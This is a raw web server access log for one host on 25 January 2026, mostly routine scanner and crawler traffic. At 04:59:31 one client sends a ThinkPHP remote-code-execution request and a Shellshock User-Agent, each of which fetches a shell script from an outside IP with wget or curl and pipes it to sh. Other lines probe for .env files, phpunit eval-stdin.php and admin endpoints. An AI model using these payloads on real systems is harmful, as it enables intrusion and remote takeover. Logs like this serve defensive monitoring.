+[25/Jan/2026:03:27:02 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[25/Jan/2026:03:28:36 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.122] [Length 154] [Gzip -] "-" "-" +[25/Jan/2026:03:29:13 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:03:41:30 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:03:42:45 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 20.168.122.61] [Length 154] [Gzip -] "-" "-" +[25/Jan/2026:03:44:32 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:03:50:58 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:03:56:37 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:03:56:49 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:04:16:16 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.8] [Length 1033] [Gzip -] "-" "-" +[25/Jan/2026:04:17:25 +0000] 200 - GET http 91.82.215.191 "/" [Client 83.142.10.98] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-" +[25/Jan/2026:04:20:11 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[25/Jan/2026:04:21:41 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:04:21:54 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:04:28:41 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:04:45:08 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:04:46:03 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:04:47:03 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 198.235.24.242] [Length 1033] [Gzip -] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[25/Jan/2026:04:48:09 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:04:58:41 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[25/Jan/2026:04:59:31 +0000] 404 - POST http 91.82.215.191 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[25/Jan/2026:04:59:31 +0000] 404 - GET http 91.82.215.191 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C6f7182e4%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C6f7182e4%7C%7Ccurl%20-s%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C6f7182e4%29%7Csh" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[25/Jan/2026:04:59:31 +0000] 404 - POST http 91.82.215.191 "/index.php?s=captcha" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[25/Jan/2026:04:59:31 +0000] 200 - GET http 91.82.215.191 "/" [Client 192.159.99.95] [Length 1033] [Gzip -] "() { :; }; /bin/bash -c \x22(wget -qO- http://41.231.37.153/rondo.qre.sh?=\x5C6f7182e4||busybox wget -qO- http://41.231.37.153/rondo.qre.sh?=\x5C6f7182e4||curl -s http://41.231.37.153/rondo.qre.sh?=\x5C6f7182e4)|sh\x22& # rondo2012@atomicmail.io" "-" +[25/Jan/2026:04:59:31 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 192.159.99.95] [Length 0] [Gzip -] "-" "-" +[25/Jan/2026:05:09:30 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.122] [Length 154] [Gzip -] "-" "-" +[25/Jan/2026:05:09:45 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:05:10:22 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:05:17:37 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:05:23:37 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:05:33:27 +0000] 200 - GET http 91.82.215.191 "/" [Client 185.247.137.94] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" "-" +[25/Jan/2026:05:35:31 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:05:38:18 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:05:47:09 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:05:47:14 +0000] 400 - GET http 91.82.215.191 "/login" [Client 150.241.87.73] [Length 252] [Gzip -] "Mozilla/5.0" "-" +[25/Jan/2026:05:50:58 +0000] 400 - GET http 91.82.215.191 "/" [Client 194.187.176.138] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" "-" +[25/Jan/2026:05:50:58 +0000] 400 - GET http 91.82.215.191 "/favicon.ico" [Client 194.187.176.212] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" "-" +[25/Jan/2026:05:55:59 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 198.235.24.72] [Length 154] [Gzip -] "-" "-" +[25/Jan/2026:05:55:59 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 198.235.24.72] [Length 154] [Gzip -] "-" "-" +[25/Jan/2026:06:01:14 +0000] 200 - GET http 91.82.215.191 "/?XDEBUG_SESSION_START=phpstorm" [Client 79.124.40.174] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:06:02:53 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:06:08:02 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[25/Jan/2026:06:09:09 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:06:24:30 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:06:26:40 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:06:30:08 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[25/Jan/2026:06:33:19 +0000] 200 - GET http 91.82.215.191 "/" [Client 137.184.173.205] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[25/Jan/2026:06:33:20 +0000] 400 - GET http 91.82.215.191 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[25/Jan/2026:06:33:54 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 154.92.16.80] [Length 154] [Gzip -] "-" "-" +[25/Jan/2026:06:35:05 +0000] 200 - GET http 91.82.215.191 "/" [Client 149.100.11.243] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:06:38:32 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:06:40:31 +0000] 200 - GET http 91.82.215.191 "/" [Client 2.35.206.41] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-" +[25/Jan/2026:06:40:38 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:06:41:34 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[25/Jan/2026:06:44:36 +0000] 200 - GET http 91.82.215.191 "/" [Client 3.149.59.26] [Length 568] [Gzip 1.86] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[25/Jan/2026:06:45:04 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.149.59.26] [Length 154] [Gzip -] "-" "-" +[25/Jan/2026:06:45:13 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.149.59.26] [Length 154] [Gzip -] "-" "-" +[25/Jan/2026:06:45:34 +0000] 200 - GET http 91.82.215.191 "/" [Client 3.149.59.26] [Length 568] [Gzip 1.86] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[25/Jan/2026:06:47:14 +0000] 404 - GET http 91.82.215.191 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:06:49:33 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.149.59.26] [Length 0] [Gzip -] "-" "-" +[25/Jan/2026:06:53:15 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:06:53:32 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[25/Jan/2026:06:57:30 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:07:05:15 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:07:12:58 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:07:16:02 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:07:19:22 +0000] 404 - GET http 91.82.215.191 "/actuator/gateway/routes" [Client 79.124.40.174] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:07:19:55 +0000] 404 - GET http 91.82.215.191 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:07:22:58 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.122] [Length 154] [Gzip -] "-" "-" +[25/Jan/2026:07:26:19 +0000] 404 - GET http 91.82.215.191 "/cgi-bin/luci/;stok=/locale" [Client 91.224.92.115] [Length 150] [Gzip -] "-" "-" +[25/Jan/2026:07:32:12 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[25/Jan/2026:07:39:10 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:07:43:10 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:07:44:20 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:07:52:17 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 216.180.246.40] [Length 1033] [Gzip -] "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'" "-" +[25/Jan/2026:07:52:25 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 216.180.246.40] [Length 154] [Gzip -] "-" "-" +[25/Jan/2026:07:53:00 +0000] 200 - GET http 91.82.215.191 "/" [Client 216.180.246.40] [Length 568] [Gzip 1.86] "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'" "-" +[25/Jan/2026:07:57:33 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:07:59:37 +0000] 404 - GET http 91.82.215.191 "/login" [Client 193.142.146.230] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[25/Jan/2026:07:59:59 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 216.180.246.40] [Length 154] [Gzip -] "-" "-" +[25/Jan/2026:08:00:12 +0000] 400 - GET http 91.82.215.191 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[25/Jan/2026:08:07:15 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 79.124.40.174] [Length 154] [Gzip -] "-" "-" +[25/Jan/2026:08:07:58 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:08:15:00 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[25/Jan/2026:08:32:07 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:08:34:37 +0000] 400 - GET http 91-82-215-191.pool.digikabel.hu "/" [Client 101.199.254.242] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[25/Jan/2026:08:34:41 +0000] 400 - GET http 91-82-215-191.pool.digikabel.hu "/favicon.ico" [Client 101.199.254.203] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[25/Jan/2026:08:34:44 +0000] 400 - GET http 91-82-215-191.pool.digikabel.hu "/robots.txt" [Client 101.199.254.202] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[25/Jan/2026:08:34:46 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:08:34:47 +0000] 400 - GET http 91-82-215-191.pool.digikabel.hu "/sitemap.xml" [Client 101.199.254.206] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[25/Jan/2026:08:35:43 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 101.199.254.236] [Length 154] [Gzip -] "-" "-" +[25/Jan/2026:08:35:44 +0000] 200 - GET http 91-82-215-191.pool.digikabel.hu "/" [Client 101.199.254.234] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[25/Jan/2026:08:36:05 +0000] 400 - GET http 91-82-215-191.pool.digikabel.hu "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[25/Jan/2026:08:36:08 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/robots.txt" [Client 101.199.254.208] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[25/Jan/2026:08:36:10 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/sitemap.xml" [Client 101.199.254.201] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[25/Jan/2026:08:36:13 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/config.json" [Client 101.199.254.198] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[25/Jan/2026:08:45:28 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:08:49:17 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:08:51:18 +0000] 404 - GET http 91.82.215.191 "/.env" [Client 77.83.39.218] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.84 Safari/537.36" "-" +[25/Jan/2026:08:52:24 +0000] 200 - GET http 91.82.215.191 "/" [Client 147.185.132.128] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[25/Jan/2026:08:52:47 +0000] 400 - GET http 91-82-215-191.pool.digikabel.hu "/" [Client 101.91.110.163] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[25/Jan/2026:08:52:51 +0000] 400 - GET http 91-82-215-191.pool.digikabel.hu "/favicon.ico" [Client 101.91.110.142] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[25/Jan/2026:08:52:54 +0000] 400 - GET http 91-82-215-191.pool.digikabel.hu "/robots.txt" [Client 101.91.110.14] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[25/Jan/2026:08:52:57 +0000] 400 - GET http 91-82-215-191.pool.digikabel.hu "/sitemap.xml" [Client 101.91.110.33] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[25/Jan/2026:08:53:43 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:08:54:10 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[25/Jan/2026:08:54:47 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 101.91.110.164] [Length 154] [Gzip -] "-" "-" +[25/Jan/2026:08:54:48 +0000] 200 - GET http 91-82-215-191.pool.digikabel.hu "/" [Client 101.91.110.144] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[25/Jan/2026:08:55:09 +0000] 400 - GET http 91-82-215-191.pool.digikabel.hu "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[25/Jan/2026:08:55:11 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/robots.txt" [Client 101.91.110.23] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[25/Jan/2026:08:55:14 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/sitemap.xml" [Client 101.91.110.164] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[25/Jan/2026:08:55:18 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/config.json" [Client 101.91.110.151] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[25/Jan/2026:08:55:34 +0000] 405 - POST http 91.82.215.191 "/" [Client 79.124.40.174] [Length 556] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 